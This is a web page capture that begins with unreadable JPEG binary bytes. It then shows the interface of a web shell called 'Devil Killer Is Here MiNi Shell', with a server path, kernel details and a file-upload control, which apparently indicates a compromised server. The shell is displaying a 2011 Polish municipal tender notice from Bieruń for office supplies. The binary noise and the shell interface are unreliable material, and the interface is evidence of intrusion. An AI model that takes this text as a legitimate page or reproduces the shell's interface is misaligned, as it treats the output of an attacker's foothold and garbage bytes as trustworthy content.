JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111215/332513-N-2011.html

<p class="kh_header"><b>Bieruń: ZAKUP TYPOWYCH MATERIAŁÓW BIUROWYCH</b><br>
<b>Numer ogłoszenia: 332513 - 2011; data zamieszczenia: 15.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP TYPOWYCH MATERIAŁÓW BIUROWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest sukcesywna dostawa  materiałów biurowych na adres Urzędu Miejskiego w Bieruniu ul. Rynek 14,  raz w miesiącu, na podstawie zgłoszenia dokonywanego telefonicznie lub faksem, na warunkach określonych we wzorze do umowy, w następujących ilościach:
Lp.	Nazwa materiału	Jednostka
Miary	Planowana
ilość
zakupów
1	2	3	4
1.	BLOCZEK kostka biała klejona na jednym boku wym. 8,5 x 8,5 cm, 300 kartek	Bloczek	50
2.	BLOCZEK samoprzylepny wym. 7,5 x 7,5 cm, 320 kartek, mix kolorów 	Bloczek	200
3.	BLOK LISTOWY A-5 z okładką, klejony na górze, 100 kartkowy 	Szt.	50
4.	BLOK LISTOWY A-4 z okładką, klejony na górze, 100 kartkowy 	Szt.	100
5. 	CIENKOPIS z końcówką o grubości 0,4 mm, tusz na bazie wody, końcówka oprawiona w metal, w etui 6 kolorów: czerwony, fioletowy, lila, niebieski, zielony, czarny 	Kpl.	80
6.	DŁUGOPIS ŻELOWY   z wymiennym   wkładem 0,5 mm, gumowy, ergonomiczny, grubość linii pisania     0,32 mm długość linii pisania 1200 m,            
z wkładem niebieskim	Szt.	300
7. 	DŁUGOPIS ŻELOWY   z wymiennym   wkładem 0,5 mm, gumowy, ergonomiczny, grubość linii pisania    0,32 mm długość linii pisania 1200 m,            
z wkładem czarnym	Szt.	100
8.	DŁUGOPIS ŻELOWY   z wymiennym   wkładem 0,5 mm, gumowy, ergonomiczny, grubość linii pisania    0,32 mm długość linii pisania 1200 m,             
z wkładem czerwonym	Szt.	50
9.	 DŁUGOPIS ŻELOWY   z wymiennym   wkładem 0,5 mm, gumowy, ergonomiczny, grubość linii pisania    0,32 mm długość linii pisania 1200 m,             
z wkładem zielonym	Szt.	50
10.	DLUGOPIS ZWYKŁY jednorazowy z cienką końcówką 0,7 mm, średnia długość linii pisania 3000 m
z wkładem niebieskim	Szt.	600
11.	DŁUGOPIS ZWYKŁY jednorazowy z cienką końcówką 0,7 mm, średnia długość linii pisania 3000 m
z wkładem czarnym	Szt.	50
12.	DŁUGOPIS automatyczny, wkład wymienny, obudowa z tworzywa sztucznego, klips i wykończenia niklowane, średnica kulki wkładu: 0,8mm, szerokość linii pisania: 05-0,7 mm, długość linii pisania: 3500m, kolor wkładu niebieski	Szt.	100
13.	DZIURKACZ biurowy o trwałej, metalowej konstrukcji - możliwość dziurkowania  do 30 standardowych kartek - odległość dziurek od brzegu karki 8 mm - wysuwany ogranicznik ze wskaźnikiem środka strony	Szt.	15

14.	GUMKI do gumowania gumujące ołówek o wym. 5,2x2,2x1,2cm	Szt.	70
15.	GUMKI recepturki, zawartość kauczuku 80 %, średnica 57 mm, mix kolorów	opakowanie
(100 szt.)	5
16.	GRZBIETY plastikowe do bindowania 
20 mm	Paczki
(100 szt.)	3
17.	GRZBIETY plastikowe  do bindowania       16 mm	Paczki (100 szt.)	3
18	GRZBIETY plastikowe do bindowania       
10 mm	Paczki (100 szt.)	2
19.	GRZBIETY plastikowe do bindowania      
6 mm	Paczki (100 szt.)	2
20..	KOPERTY listowe C-6 - samoklejące,
Białe	Op.
(1000 szt.)	15
21. 	KOPERTY listowe samoklejące o wym. 
22 cm x 11 cm z okienkiem w prawym dolnym rogu, białe	Op.
(1000 szt.)	10
22.	KOPERTY C-4 białe, samoklejące
	Szt.	3000
23.	KOPERTY B-5 białe, samoklejące	Szt.	4000
24.	KOPERTY C-6 białe, samoprzylepne 
z okienkiem w prawym dolnym rogu	Szt.	5000
25.	KOPERTY białe C-3 - samoklejące
	Szt.	300
26.	KOPERTY C-4, papier o gramaturze   140 g/m2, z rozszerzanymi bokami i dnem,  brązowe	Szt.	100
27.	KLEJ biurowy w sztyfcie 36 g	Szt.	50
28	KOREKTOR w płynie szybkoschnący, dobrze kryjący na bazie rozpuszczalnika, pojemność 20 ml 
	Szt.	50
29	KOREKTOR w taśmie do używania na papierze zwykłym i faksowym, silikonowa taśma, długość taśmy 8,5 m szer. taśmy 4,2 mm
	Szt.	100
30.	PUDŁA kartonowe do archiwum: dłg 250 x wys.355 mm grzbiet 100 mm, posiadające miejsca na opisy	Szt.	500
31	PUDŁA kartonowe do archiwum  dłg. 250 x wys. 355 mm grzbiet 150 mm, posiadające miejsca na opisy	Szt.	50
32	KALKULATOR   - 12 pozycyjny, wyświetlacz, podwójna pamięć, zaokrąglenia w górę i w dół, ustawianie do 2 miejsc po przecinku, klawisz cofania, wymiary: minimum 15 cm   x 15 cm, 	Szt.	5
33	KREDKI ołówkowe wykonane z wysokiej jakości drewna, wkłady gwarantujące intensywne kolory, kpl po 12 kolorów
	Kpl.	3
34	LINIJKA plastikowa 30 cm
	Szt.	10
35	N0ŻYCZKI ogólnego zastosowania , ergonomiczna rękojeść z niełamliwego plastiku, satynowe ostrze ze stali nierdzewnej, min. dł. 17 cm
	Szt.	30
36	ETYKIETY na grzbiety do segregatorów A4, szer. grzbietu 50mm	Szt.	250
37	ETYKIETY na grzbiety do segregatorów A4, szer. grzbietu 75 mm	Szt.	250
38	OKŁADKI skóropodobne  A-4 do bindowania, o gramaturze 250 g/m2 	Op.
(100 szt.)	10
39	OKŁADKI do bindowania przeźroczyste krystaliczne A-4, wykonane z PCV, bezbarwne, 200 mic.	Op.
(100 szt.)	10
40	OFERTÓWKI formatu A4,  wykonane z przeźroczystego polipropylenu, grubość folii: 90 mikronów, otwierane z boku       i góry	Szt.
	700
41	OFERTÓWKI A-4 do wpinania w segregator, przeźroczyste, wykonane z folii o grubości 48 mikronów	Op. 
(100 szt.)	100
42	OŁÓWEK automatyczny z grafitem 0,5 mm, ergonomiczny profilowany uchwyt, włączanie grafitu przez przycisk
	Szt.	50
43	OŁÓWEK z gumką, HB, sześciokątny przekrój, wytrzymały grafit o śr. 2,4 mm
	Szt.	50
44	PAPIER kserograficzny A-4, gramatura 80  g/m2, białość CIE 146, technologia CoolorLokTM	Ryza	1200








45	PAPIER kserograficzny A-3, gramatura 80  g/m2, białość  CIE 146, technologia CoolorLokTM	Ryz	40
46	PAPIER  na dyplomy, płótno drobne, kolor biały, gramatura 150-200 g/m2
	Szt.	400
47	PAPIER na dyplomy, płótno drobne, kolor ecru, gramatura 150-200 g/m2
 	Szt.	300
48	POJEMNIKI tekturowe na dokumenty ścięte (rożki) o wym. dł. 255 x szer. 80 x wys. 318 mm	Szt.	100
49	PODUSZKA do stempli z wkładem barwiącym nasączonym  tuszem w kolorze czerwonym  o wym. 90x160 mm, obudowa z tworzywa sztucznego	Szt.	20
50	ROZSZYWACZE dokumentów
	Szt.	10
51	SKOROWIDZ alfabetyczny A-4 - szyty, w kratkę, 96 kartek, twarda okładka
	Szt.	5
52	SEGREGATOR A4 z mechanizmem dźwigowym, wykonany z kartonu pokrytego z zewnątrz poliolefiną, dolna krawędź  wzmocniona metalową szyną, wymienna etykieta na grzbiecie, szer. grzbietu 50 mm	Szt.	150
53	SEGREGATOR A4 z mechanizmem dźwigowym, wykonany z kartonu pokrytego z zewnątrz poliolefiną, dolna krawędź  wzmocniona metalową szyną, wymienna etykieta na grzbiecie, szer. grzbietu 75 mm	Szt.	300
54	SKOROWIDZ alfabetyczny  A-5 - szyty, w kratkę, 96 kartek,  twarda okładka
	Szt.	5
55	SKOROSZYT  kartonowy zawieszany
oczkowy pełny	Szt.	500
56.	SKOROSZYT plastikowy formatu A4,     z otworami pozwalającymi na wpięcie do segregatora, tylna okładka kolorowa, przednia przeźroczysta, wysuwany papierowy pasek do opisu 
	Szt.	3000
57.	SPINACZE duże krzyżowe 41 mm, kolor srebrny
	Opak.
(50 zł.)	10
58.	SPINACZE małe owalne metalowe, kolor srebrny28 mm	Opak.
(100 szt.)	200
59.	TECZKA  kartonowa wiązana, posiadająca trzy wewnętrzne klapy, bawełniane tasiemki, kolor biały
	Szt.	800
60.	TECZKI  kartonowe wiązane, posiadające trzy wewnętrzne klapy, bawełniane tasiemki, kolorowe
	Szt.	100
61.	TECZKI wykonane z grubej tektury pokrytej folią polipropylenową, posiadające trzy wewnętrzne klapy, gumka wzdłuż długiego boku, kolorowe 	Szt.	100
62.	TECZKA kartonowa  z narożnymi gumkami, posiadająca trzy wewnętrzne klapy, kolor biały
	Szt.	300
63.	TUSZ do stempli na bazie wody, czerwony, poj. 30 ml
	Szt.	15
64.	TAŚMA klejąca przeźroczysta 24 mm x 30 m
	Rolka	200
65.	TAŚMA pakowa przeźroczysta klejąca na nośniku z PP na bazie modyfikowanego kleju akrylowego, wymiary: dł 60 m x szer.48 mm      	Rolka	40
66.	TECZKI do podpisu - okładka skóropodobna, wykonana z kartonu i pokryta skóropodobnym tworzywem, grzbiet harmonijkowy, kartonowe przekładki z dwoma otworami, liczba przekładek 20 	Szt.	30
67.	TEMPERÓWKA metalowa w kształcie klina	Szt.	35
68.	WKŁAD do długopisów klasy  Parker niebieskie - metalowe 
	Szt.	50
69.	WKŁAD - grafit  do ołówka automatycznego        0,5 mm HB	Paczki	30
70.	BRULION A-4 - 96 kart. w twardej okładce, szyty introligatorsko, w kratkę, 
	Szt.	50
71.	ZESZYT A-5 - 60 kartek miękka okładka, w kratkę, zszyty zszywkami
	Szt.	20
72.	ZESZYT A-5 - 80 kartek miękka okładka, w kratkę, zszyty zszywkami
	Szt.	20
73.	BRULION A-5 - 96 kartek, w twardej okładce, szyty introligatorsko, w kratkę, 	Szt.	50
74.	ZESZYT B-5 160 kart. twarda okładka, w kratkę, zszyty introligatorsko	Szt.	50
75.	ZAKREŚLACZE fluorescencyjne ze ściętą końcówką 3 mm, wodoodporny tusz, w etui 4 kolory: zielony, żółty, pomarańczowy, różowy	Kpl.	80
76.	Zszywki standardowe 24/6	Opak. (1000 szt.)	200
77.	PODKŁADKA do pisania z mechanizmem zaciskowym, z grubej tektury oklejonej folią PCV	Szt.	10
78	ZSZYWACZ biurowy na zszywki  24/6 , wykonany z metalu, z plastikową oprawą, zszywający do 30 kartek, głębokość wsuwania kartek: 65 mm 	Szt.
	15
79	FOLIA do laminowania A4, błyszcząca,
grubość folii 250 (2 x 125 mic) 	Opakowanie (100 szt.)	3
80	FOLIA do laminowania A3, błyszcząca, grubość folii 250  (2x125mic)	Opakowanie (100 szt.)	2
81.	MARKER przeznaczony do pisania, zakreślania i wykonywania oznaczeń  na większości materiałów, również na metalu, tworzywie sztucznym i szkle, tusz szybkoschnący, nieplamiący, wodoodporny, grubość linii   pisania: 1,5-3mm, kolor czarny 	szt.	20


Ilości podane ww. tabeli są ilościami maksymalnymi										
Jeżeli w SIWZ  określone zostały materiały przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów i urządzeń równoważnych, lecz      o nie gorszych parametrach i spełniających wymogi podane w opisie przedmiotu zamówienia. Podane w opisach nazwy własne nie mają na celu naruszenia art.29 i 7 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu jakościowego, technologicznego i estetycznego. 
Zamawiający nie przewiduje: udzielenia zamówień uzupełniających, udzielenia zaliczek na poczet wykonania zamówienia, aukcji elektronicznej, zawarcia umowy ramowej, dynamicznego systemu zakupów, stosowania wymagań, o których mowa w art. 29 ust. 4   ustawy pzp. 
Zamawiający nie dopuszcza składania ofert częściowych i  wariantowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.92.30-1, 30.19.95.00-5, 22.81.60.00-3, 22.85.10.00-0, 22.81.50.00-6, 30.19.21.21-5, 30.19.73.20-5, 30.19.73.30-8, 30.19.21.60-0, 30.19.21.31-8, 30.19.21.11-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
     Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę: 
       - oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
       W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie:
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonych w ofercie: 
-oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp ) .
      W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy 
      wykazać,   że   warunek  spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę :
- oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie 
       przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp)
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:         
         Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie          
         przedłożonego przez wykonawcę :
         - oświadczenia (zgodnie z art. 22 ust.1 pkt 4 ustawy pzp ).
      W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy 
      wykazać,   że   warunek  spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1)	Oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1.	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	posiada wiedzę i doświadczenie potrzebne do wykonania zamówienia; 
3.	dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. 
Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
1)	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt Lista wymaganych oświadczeń   
       oraz  w pkt. Lista wymaganych dokumentów.
       Zamiast dokumentu, o którym mowa w punkcie  1 Listy wymaganych dokumentów 
       przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
       zamieszkania, potwierdzające odpowiednio, że:
       a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
       
Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed   upływem terminu składania ofert.
       Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je
       dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem    
       sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
       odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania.
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentów, o których mowa w pkt 1
        niniejszej uwagi.
      2)  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
    3)  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz                   w przypadku  podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
    4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach          zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
5) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. 
     konsorcjum/spółki cywilnej) do oferty należy dołączyć : 
a)	Informacje w zakresie oznaczenie stron wchodzących w skład podmiotu wspólnego, zasady reprezentacji  ze wskazaniem pełnomocnika ( lidera), jego zakresu działania i uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. 
    b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby warunki ,                 
           o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili  łącznie.
 c) Dokumenty wymienione w pkt. V B ppkt. 1 i 2 Listy wymaganych dokumentów  składa  każdy z wykonawców wchodzących w skład podmiotu występującego wspólnie.
d) Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem / Liderem
e) Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność                       z oryginałem przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez wszystkich wykonawców wchodzących w skład tego podmiotu.
Do oferty należy  załączyć informacje  w zakresie :
1) Części zamówienia, która  zostanie powierzona podwykonawcom. W przypadku
    braku złożenia informacji lub braku wypełnienia formularza ofertowego w tym zakresie,  
    zamawiający uzna, że wykonawca wykona całość zamówienia sam bez powierzenia części 
    zamówienia podwykonawcom.              
2) Sposobu reprezentacji podmiotów występujących wspólnie ( pełnomocnictwo) -                          
     w  przypadku ich udziału w postępowaniu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


